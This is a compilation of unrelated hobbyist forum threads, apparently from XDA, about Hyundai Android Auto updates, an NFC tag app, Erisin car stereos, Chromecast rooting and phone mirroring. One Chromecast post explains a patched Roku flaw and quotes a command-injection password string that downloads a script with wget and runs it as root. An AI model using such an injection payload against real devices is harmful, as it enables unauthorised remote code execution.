Hi everyone,
Hyundai just released an update that adds Android Auto to their 2017 Hyundai Santa Fe Sport. I own one but unfortunately the download is not available outside the US
I was hoping that maybe a fellow XDA member could help me out?
PM me or email me or whatever you feel like if you can help me out, please
Anybody? Maybe someone knows a dealer or simply an owner? A lot of guys in Canada and Europe are hoping for your help, guys and girls :fingers-crossed:
Unfortunately, I'm not sure it could work. First of all, the patch checks the existing firmware version and it won't apply unless it starts with ST.LF.USA.
See this screenshot:
http://www.hyundai-forums.com/attachment.php?attachmentid=283305
I haven't seen the files, but apparently its possible to bypass the check by editing some files.
See this post:
http://www.hyundai-forums.com/showpost.php?p=3773769&postcount=653
Unfortunately, it bricks the head unit. Maybe it's possible to hack the update to bypass this check too, but we have to see the files and what the update does.
Here is the installer for the sonata with nav.
http://www.hyundai-forums.com/lf-20...5-sonata-carplay-update-tool.html#post4352129
It also includes the maps. I can't download it because it's an app that downloads directly to a sd card, but if somebody could download it and upload it to google drive, I would really like to be able to take a look at the files.
Thank you very much
Do you by any chance know of a download for the 2017 Santa Fe (Sport)?
I am not sure if the bigger issue won't be the cars' different hardware.
But the 2017 Santa Fe Sport seems to be the same in the US, Canada and Europe. So that might give us a really good chance at making it work
So far the Santa Fe owners have, however, not been very forthcoming
Hi
I own the VF which is European i40 and downloaded the files for LF. It is 13Gb update including maps. The update itself fits a lot of hyundai/kia cars, but there are too much config files to change.
Will put the update for LF to google drive later today.

Its my understanding the update is coded to the VIN in some way via the download in the MyHyundai site.
some kia models have the same head unit, you can go and buy maps update on sd card and you'll get AA along with new maps. So I dont think its vin coded
ns100,
Thanks for the files. Is this the update that I posted? And did you manage to install it on your car? Also, where did you get all this info about the headunit?
stinger6667, yes, I used mac os app to download the files to sd card. I did not install it, I want first to get an update for another kia/hyundai car to compare what changes.
if you check the update.ini file you'll see which hyundai/kia models it can de installed at. all the info I've got on Russian kia soul and kia sorento prime forums
the software changelog for this headunit can be found here - _bluemembers.hyundai.com/oc/hmgt/navi/hmgt_navi_guide.jsp?screenNm=hmgt_navi_guide its Korean but google translate colud help
there is an update worth $150 for some kia models adding android auto which comes with the latest map update. If someone could upload the contents of /update folder form sd card there will be an option to build an update for adding android auto for any kia/hyundai with this headunit
found on kia soul forum, this is the hardware part (build.prop in system.img)

Alright, well this is way beyond my paygrade, I'm just a web dev. Also, I made a mistake. The update I linked for the sonata only adds Carplay. What we need is the Genesis 2015/2016 or Tuscon 2016 update. They add both Android auto and Carplay.
the canadian update looks interesting as it adds the features to older models as well

can I download it somewhere?
Unfortunately not because it costs $300. Seems to be coming directly from the software company hired by Hyundai to program their software. And rather than making it available to their costumers as the US did, the Canadian Hyundai people have not provided it free of charge.
I don't know if someone bought it and shared it somewhere. But I have not really looked that hard yet.
I think they charge $$$ for the map update, headunit software update should be free. There is only one folder /update needed form the sd card
i sould need to google it, but the software is not free. there was an article by a blogger who is active on hyundai-forums.com
canadian users do not get it for free. maybe this will change or did change just now, but the last i read it was not for free.

no one has 2.3.3 yet :-(
Wow, great to see some early practical demo work! Gives me hope that NFC might not be so useless in the near term after all.
Thanks! ...Now I just have to wait for 2.3.3. >.>
wow! thank you!
time to play with it
darn that sucks, it wont let me install it because of the version
Sorry we made you guys wait, but we wanted to make sure it was in the market the second the OTA came out, which is any day now according to google.

Correct, we make hooks in the software so it only installs on phones with 2.3.3 and NFC. These requirements are needed to do NFC tag writing.

Great, so unless the OTA is on this weekend, maybe in the coming weeks
Can you tell us of other features on 2.3.3 other than the official ones? bugfixes and whatnot?

OTA is expected to happen any day now (I'm hearing Monday is the day, but don't know for sure).
Sounds good to me, don't know where I am going to be able to test it out though, not much nfc stuff on the go in the UK lol

Yubikeys are quite neat, fairly inexpensive, USB security tokens. They happen to have a MiFare classic NFC chip built in too. Fairly easy to get hold of across Europe if you want to experiment.

Check you WWW.Laks.com too. They sell a NFC watch.

ok so its clear that 'some' I9023's have 2.3.3 pre-loaded. its also clear that NXP guys have it, coz well they made the chip in the nexus (right?) and they cant test it without it. there's apparently some BT profiles also coming with 2.3.3 (file transfer, etc). can anyone confirm this?
I wonder what the hold up is.
I now have 2.3.3 but it still won't let me install.

NFC TagWriter doesn't show in Android Market.
Can NXP investigate the problem?
Thanks.
Same for me. I just upgraded to 2.3.3 but I can't find the TagWriter app in the Market from my phone. If I go to https ://market.android.com/details?id=com.nxp.nfc.tagwriter on my PC, it won't let me push it to my Nexus S either as the device is grayed out.

Things like this are common when google updates a handset. They need to update the servers to allow the updated devices to access apps. some other apps will be missing to like the official Paypal app.
Have to wait.
Seen this on another thread somewhere the other day.
For those of us who manually installed the update early is there any chance of NXP posting up a direct link to the apk? Not sure if that will work but I dont see why not
I'm starting to think this is Vapor Ware, or maybe Malware, they hyped the app, then seemed to falloff the face of the earth. Anyone try to install the app and see any weird things on the phone after?
Not saying I have, just asking if anyone has.
Order and Choos version 1.0.3 is now officially supported for Xoom and A500. However, I'm an Asus TF101 owner (sucks to be me) and cannot DL from market. Keen to hear from anyone how the new version stacks up with official honeycomb support.
It still says game is not compatible with your device. The update notes show support but I can't get it to download. Has anyone else been successful?
It also shows support on gameloft and is for sale $4.99. They also don't recognize my purchase order # from Android Market.

Did you pay for it on your device and try to download it? I have an unrooted wifi xoom that I was able to download and start playing with.
In case you still dont have it working....I just bought my xoom today and was getting the same error when trying to open the game. I called gameloft and they emailed me a download link. Went to my downloads in astro and installed it from there. Seems to be working now.. Its currently downloading the extra 677.4 MB but it has opened further so far than it ever has. If it ends up with the same error I'll let you know, if it works I'll be busy playing lol good luck.

i am used to flashing roms with android for quite sometime and i did hope when getting this tablet there may be some options after getting it to be able to get a kernel to make it run faster...
or maybe any type of custom rom that i can use
i don't expect a huge response but it would be nice if anyone can point me in a direction that may help max this device out...

Anything? Anyone?
Bump since I'm looking at the 777A. I can find information about the 666, but that's only running 2.1 and I never read into the 42 pages information enough to see if there were ROM's or Kernels since I stopped reading when I found out I can at least Z4Root.
i did read in some forums that there is a way to put cyanogenmod on it
Bump as I'm setting up mine now
Let us know how everything goes? I'm looking to try out the Erisin ES778A.
I'm planning on installing the stereo tomorrow (technically later today), so I'll keep you posted. I've been using the pad in the meantime, typical Android fashion and treating it like my phone...installed 90% of the same apps, launcher, etc. I've found hotspot widgets for my phone, so I stay tethered while at work, then WiFi when I'm at home. I wish the screen was a bit brighter, but it's no better or worse so far than the AVIC F90BT I was using before. I've been spoiled w/ AMOLED on my phone, so seeing the same screen emulated on the pad shows the differences in color...and the differences between touchscreen styles.
I've yet to figure out how to root the unit since Z4Root doesn't do temporary or permanent, so I haven't gotten into things like seeing if I can overclock the CPU, increase the SD card reading speed, etc. So far the only real things I've noticed that are odd about the pad is that it has 3 seperate locations for memory/storage, ie NAND, SD (4GB card included) and something else. I don't know if the seperate NAND or whatever is what stores the WinCE portion of the stereo, but once I find/make a backup of the stock software (just in case I brick the thing playing w/ it), I haven't explored into what I can delete to increase it's efficiency. There are apps I will never use on it, so it'd be nice to delete things I don't need and customize it as I have my phone to exactly what I want. I've noticed I can't designate a default browser (I use browser chooser first, then I run stock, Opera and Skyfire) and once in a blue moon it acts as if it can't read the card or if it's not there, but reboot/power-cycling the device fixes it. I have an extra 16GB card I'm going to throw into the unit anyways, so we'll see if that changes that little hiccup.
From what I've read and the emailing w/ the seller of the Erisin deck, the 777 is for the US market and 778 is for the EU market...being the difference in the TV tuner. EU has digital for the DVT-B, so they can tune stuff if, and while we've recently made the switch from analog to digital finally, the 777 as it is won't pick up digital TV like it would in a newer style TV w/ a built-in digital tuner for free HDTV channels. Myself and a co-worker have been looking into a powered converter (he uses one in his house, hooked up to a non-HDTV) that will work with the stereo that won't have a seperate remote for changing channels, but it's not critical to me since I plan on streaming everything anyways....hence difference browsers for different sites.
I thought the 778 had Bluetooth built into the Pad where the 777 has it in the main unit only? That's the only reason I wanted the 778 over the 777.
i ordered the 778a and the main unit has the bluetooth not the tablet... kinda gay
How much did you pay for it and how long did it take to arrive?
i paid $380 or so and it took around 3 days for it to come
Hey I just purchased the ES7835a and I'm looking for the original firmware to restore my tablet. Would you happen to still have it lying around?
Sent from my SPH-L900 using xda app-developers app
Thread bump as I installed a newer version, the ES7035A, into my truck yesterday. The ES777A was OK, but after a few months it had an internal grounding error, so it'd pop the subwoofer on shutdown and power up. After arguing with Erisin about their warranty, I paid for return shipping back to them, paid the difference to upgrade to the ES7035A (thinner pad, Bluetooth in the tablet and deck) and then got PayPal involved after I received yet another one that was broken (a few buttons atop the tablet had failed, ends up the swtich soldered to the board broke off, so I soldered it back on myself) and they refunded my shipping and upgrade charges.
Now that I've got it installed, I'm looking at options for rooting it, seeing about maybe even upgrading to Android 4.x that the newer Erisin versions have, etc. Honestly, I'd LOVE if I could just send the tablet to a DEV here, have you back it up and everything, then custom bake a ROM, kernel, etc for myself and others to improve upon the very slow Android 2.2 that's on the tablet currently. I've read a thread about rooting TC8803 tablets, and supposedly it'll work on my tablet, but at the same time I worry about missing some step, not knowing an acronym or term someone mentioned and bricking the thing. I've baked my own ROM's in 7ZIP in the past, but if I screw this tablet up, I've got virtually NO support after the fact, so I'm not ready to take the risk just yet.
Anyone will to help?

Not sure if you're still subscribed to this thread, but when I had an issue with my ES777A, they gave me a website link that I could download the firmware. What I'd really like to do is get a link from them for downloading their 4.x firmware and installing it on my current ES7035A since it has the same specs as the newer stereos they have which are running 4.x.
My first ever stereo I bought from these guys was an ES777A, which had crashing problems. They gave me a link to download the software from, but I see a "related column" with many other "Update.zip" links, so I'm curious is there is a way to verify which is which in regards to getting my hands on the Android 4.x firmware and if it's safe to install it on my ES7035A.
http://www.ulozto.net/13150056/update-zip
After going through 3 representatives using their online chat, I finally got someone to give me the firmware for the ES7835A that runs Android 4.x. Now I'm curious how I can install this onto my ES7035A which runs Android 2.3.5. I'm trying to get them to send me the link for the ES7035A as well so that maybe someone who knows more than I can compare the two firmwares since the Erisin person I'm talking to insists I can't install it.

Well they found an exploit in the original (Shipped) ROm that Google quickly plugged up.
And Google has been updating the ROM like Crazy (Compared to what you see on Phones) so it's difficult to keep up (God Bless Team Eureka for doing so!)
Rooting presents some issues since Google could stop you from updating via OTA if it sees root so it almost makes little sense to root right now since it is unlikely to be permanent, will make getting the latest Updates sketchy.
Until such time as the ROM is mature enough with enough App Support that they won't be constantly updating the unit, (Even if just to update the Whitelist) I don't see anyone coming up with a permanent rooting method.
Truth is the Whitelist is the biggest reason to Root and Flash a custom that I know of but I'm sure Team Eureka has added some goodies to their ROM that I'm not aware of.
If you want a rooted CCast I suggest trying to find one with a Rootable Serial Number and rooting that one before it Updates with Google.
The original hack to root the Chromecast was in the boot loader. Google has patched that and made the boot loader secure. You can't install any software on the Chromecast, and it will only talk to whitelisted apps, so how are you going to root it now? I'm not saying it's impossible, just very difficult.
For example an exploit to root the very secure Roku boxes came out 2 days ago, and the security hole exploited was an incredibly dumb oversight by Roku. The Roku can be put into Developer Mode by a special combination of remote button presses. The Developer Mode displays extra information and allows you to install apps over a local network without going through the app store, but the app environment is no less secure. You can specify a password for Developer Mode when you first set it up, and you can later reset that password if you want. When you type in a new password, the Roku internally executes a shell command of the form "passwd rokudev (new password)" to set the password. Somehow Roku forget to check and clean the password field input, and you are allowed to use a semi-colon in the password. But a semi-colon is used in Linux to separate multiple commands on one line, so when the password input is internally inserted into the command line to set the new password, everything after a semi-colon is interpreted as a new Linux shell command and executed with full root privilege. So for example the password input ";wget -O/tmp/x.sh http://SomeExploitScript;sh /*/x.sh;" happily downloads and executes whatever exploit script you want on the device with full root privilege.
Could something like that happen on the CC? Maybe.

Ouch, that's like a SQL injection attack.
Back to Chromecast, I think everyone's waiting for the SDK to be released and hoping to find an exploit there, as once the SDK is released it's more difficult to change it or take it back.

Sounds like your anti-root and so your not rooted? The latest Team Eureka ROM is based on the latest Google build so I don't see a problem there. I have two TV's using only one rooted CC on my main TV but have a spare rooted CC as a backup right now.
LOL this is XDA...the word IMPOSSIBLE isn't part of the Vocabulary here!
Someone will find a way to send something to CCast that makes it rooted...
Nothing is completely secure around these parts!
I think the only current downside to being root vs not is that updates are slightly delayed.
IMO that's not a bad thing because Team Eureka has been very quick on updates and having them look at updates before they roll out to me means there's one extra level of bug detection (and in some cases, fixing!).
A potential but as of yet unmaterialized risk of being root is being denied access to Google Play Movies if root is detected. However, I don't really expect that to happen as Chromecast doesn't have storage, unlike phones which often download content for later playback.

Nope not rooted....At least on my CCast....I have a dozen other devices all rooted because rooting gives me the ability to change some parameters and add some capability disabled by default.
Not against Root but Root is really only worthwhile if you need to do something you can't do unrooted.
What are you doing with root that I can't right now other that bypass a whitelist? Running a Rom that incorporates the fixes I got today sometime tomorrow? Im sure team Eureka's rom does much more than just bypass the Whitelist but really other than All Cast (which I don't need since I got PlexPass) there is nothing I have seen root and a custom ROM do that I don't already have except maybe Screen Mirroring which doesn't really require root just someone to make an APP that tells the CCast it is a Googlecast which is on the Whitelist.
Does rooting make the NBC app able to stream to the CCast?
What I AM against is Flash Addiction though....
See a Nightly and just flash it because it's new without any regard to if it is better or stable!
Too many people seem to buy devices to flash every day as opposed to using them to do what the device is made for and can't because they keep flashing Nightlies that don't work reliably but thats another story entirely.

And let me be clear this is not meant to downplay the usefulness of the Team Eureka project in any way shape or form...
But I missed out on Rooting because I got the Update and the device doesn't seem to be limiting me on what I need it to do so I'm not really missing the lack of Whitelist!
Team Eureka has been VERY QUICK with the updates as they happen and if you have root good for you!
But I'm not going to complain or keep asking for a new Rooting Method just to have something I don't seem to need right now.
I gave up bragging about what I did to my Devices long ago! LOL

Right now the benefits are:
Custom/Team Eureka whitelist (use apps that aren't Google-blessed) (you already mentioned this )

Root will rarely fix a broken/buggy app.
So you're right - there isn't a lot of reason to root now that there are Google-blessed app options for casting from local storage, network, and Internet/cloud.
But of course, this is XDA, so sometimes we just want root for the sake of root.
...and temperatures appeal to our outer geek.

First I thought you were talking Adobe (formerly Macromedia) Flash... and I was going to agree.
But you're talking device flash. And I still agree.
I always have fear that automatic updates promote a mentality of "Oh, well, if it's broken we'll just push another update" - that's another advantage of being rooted - you could just turn OTA updates off and you don't have to accept the latest-and-sometimes-not-so-great version.
However, until the SDK is officially released, it's quite possible that some new app or feature will require a particular minimum build, which could cause the delay between official release and rooted release to cause rumblings in the impatient masses.
Long story short, the core market for Chromecast is people who want to simply Plug and Play. The rest of us are just special.
(Okay, now I think I've exhausted my smiley quota for today)

Flashing a Nightly is nothing! You see the same users in multiple ROM threads so they aren't flashing a new update, they are changing ROMs daily. I got into trouble mentioning/questioning the fact that there were numerous users that never turn off their tablets which boots in 13 seconds. Seems you can't question the reasons why. They must sleep with them!

Yep! And I'm not bemoaning anyone else wanting Root just saying that unless you REALLY need something that requires it I personally don't see the point.
But it's not like root is going to get me WiFi Tethering or a Boat free version of AOSP 4.4
I'm in the US so I don't need to worry about Region blocking and truth is I don't use any service other than NetFlix that requires it. All of My Media is my own via Plex.
As for Temperature I only have three Temps I use in my daily life...
Too Hot
Too Cold
I'm Fine!
LOL
Whitelist bypassing is about the only feature I could want but I haven't seen an App yet that I need (except maybe AllCast) that really compels me to fret about not being rooted.
I fully understand other people's desire to get root especially here, But I also know that Devs rarely waste time on doing the same thing over and over again or waste time cracking root unless they are extremely bored. They have better things to do than play Root Tag with Google!
I would hope instead of working on Root they were working on Apps that could be whitelisted cause at some point if enough apps request whitelisting and it becomes a nuisance to manage on the Google side they will get rid of it entirely! LOL

It doesn't bother me if thats how they choose to pas the time of their day...LOL To Each his own...
But they almost always come back and complain if the Dev doesn't give them their Fix in a timely fashion!
Even to the point that they donate to the Dev and then expect their $5 donation entitles them to a Weekly update to flash...
The Best however are the few who never read the changelog of the Roms they use and the Developer has a CRONTAB builder running to make a new Nightly automatically regardless if any changes were made!
And they come back and say This version is MUCH BETTER or WORSE! LOL
It's the same EXACT rom you ran yesterday! LOL
@bhiga My Chart say you still have about 20 smileys left! LOL
I chaulk most of the insanity up on FKOTB syndrome (First Kid On The BLOCK)
My devices working and stable is much more important than what it says on the About Page!
But they have been conditioned to think that one number higher somehow relates to being better! LOL
Ok enough off topic Banter My chart says I HAVE reached my Off Topic Quota for the day! LOL
So TC is basically asking someone to read the future.... Interesting.

I wonder if U.S. users understand how much content they are missing from other countries?
Like the U.K. sources such as the BBC iPlayer and ITV, and the much greater range of new movies on Netflix Canada/Mexico/Brazil/Sweden etc. where licencing is easier and cheaper?

You are reading too much into answer. I simply answered his question. No. Nobody knows if there will be an exploit. Chances are it will happen, but there currently isn't one and nobody knows if there will be one.

We can get that content just fine actually....
The restrictions for you folk in the UK have more to do with EU Import limitations not the fact content is restricted by region.
The only Content we can't get here that you can get is stuff like NFL streaming packages because the TV networks here who pay for that content forbid it. Yet I still watch live football anytime I want regardless of what they decided to show me on TV that day.
The only thing that was stopping us from seeing the stuff on BBC iPlayer was their insistence on using Flash which many devices have dropped support for in the US. They have since got away from flash I believe...I now get it via Plex Channel.
And when all else fails and it isn't available via a stream I just load up the ole uTorrent and there it is sitting on my Plex Server in no time.....
Guess it depends on how you put the subject and question together...
Is there a root method for builds newer than 12072?
No.
Will there be a root method for builds newer than 12072?
Nobody knows. The crystal ball is not giving an answer, and we don't trust the Magic 8-Ball.
Yeah, it would make things so much easier to be able to change the DNS. I hope they can get this rooted again.

Roku patched the rooting loophole in their firmware and has pushed it out by automatic update. Time from publication of the vulnerability to patching: 1.5 days.
Google isn't quite that on-the-ball, but if a new vulnerability to root the Chromecast comes out, I hope the originators wait for at least a holiday weekend before publishing it to give us a chance.
I like Android Auto on my 2018 Hyudnai SFSAWD. However, I have another app on my Note 8 (not Rooted) that is called CarHome Ultra and have used it for years. It is much cleaner and has many more options that just Android Auto.
My question is there anyone who is familiar with CarHome Ultra and knows of a way to display/use that when in Android Auto?
My Note 8 is big, but the Display on the car is much bigger and better for driving.
CarHome is on Google Play and has so many options.
Here is a video on the apk and what it does. Much cleaner and more capability than just Android Auto.
Any comments/suggestions appreciated.

I guess it is Mirror Link application. It's different (than AA) standard that need to be supported by your car audio and your smartphone.
The apps have to use valid certificates and then Mirror Link can be used with CarHome app.
Regards.

Thanks for your info. I guess there is no way for this to happen. I would really like to see something like this incorporated into AA. So much functionality.
In case it is a standalone car dashboard application, you can use AA Mirror to mirror it to your Android Auto head unit.
Download will try later and let everyone know.
Tried this apk today in the WiFi and USB modes to no success. See Attch. The apk works on my phone but only has options for:
1. Mirror to PC
2. Mirror to Phone
I do require some clarification. What do you mean by:
1. Standalone car dashboard app? (I assume that CarHome Ultra is that since I can use that in my car(s) and get all functionality on the Note 8 screen.)
2. Android Auto head unit? ( I assume that is my Hyundai AV Display on my dash.)
Thanks for your time and info. I do appreciate it greatly.
Please check this link to get an idea of mirroring your screen to your AndroidAuto head unit:

Please check this thread for a simplified guide to set it up:
https://www.reddit.com/r/GolfGTI/comments/9f07de/howto_mirror_your_phone_screen_with_android_auto/
It is fairly simple to get it running and you should be able to view(mirror) and control the CarHome Ultra app from your phone to your car display (provided it supports Android Auto).

Thank you very much for the help and info you have provided. I'm sure others will also find this very valuable.
I do have a Note 8, not rooted. My 2018 Hyundai SF Sports AWD does have Android Auto and it is really great.
The only thing that I don't like about the Hyundai AA is that it does not indicate Speed, Compass, and is somewhat limited on the apps that you can use in AA.
I would have assumed that if AA was running Android it would have allowed all Android APKs to be run just like a phone. JMHO!
However, I do understand that their are limitations on all software. If only CarHome Ultra was certified to run on AA, that would really solve the problem. I did write CarHome Ultra Support and asked if they could do something to make this app compatible with AA. Still have not heard back from them.
Again, Thank you for all the help and info. People like you make this forum a valuable asset to all who visit this site.
You're welcome, my friend.
Sadly, Android Auto has very limited capabilities and many, many restrictions with regard to its usage and modifications at this point. Please note that Android Auto is not the same as Android. If your car unit supports only AA, your experience will be very limited. However, there are many members who are trying to make the best of it and developing new ways of tweaking it (AA Mirror mentioned above is an example).
IMHO, you're better off with a head unit that has its own processor and runs complete Android by itself. The possibilities with these head units are endless as they feature a complete Android environment unlike Android Auto.
Hope you have a great weekend.

Still have not found a solution since I do not want to ROOT my phone. What head unit has its own processor and runs complete Android by itself?
Thank you again my friend for your time and help!!!!

There are many available online. You can also ask your local car accessories shop. Its better to invest in something with good specs though it might be a little pricey.
Let me know if you need any further help.

Totally confused with your reply. Don't know what a local car accessories shop can provide with me trying to mirror CarHome on my AA. I just think that AA is good, but very limited in using Android Apks unless you are looking for all the news Apks. JMHO!
I do say Thank you! You really try to help. I greatly appreciate it.

You asked which head unit runs Android by itself. My answer was for that.
If you want to run APKs or mirror your screen to your head unit, you will have to root your phone, I guess.
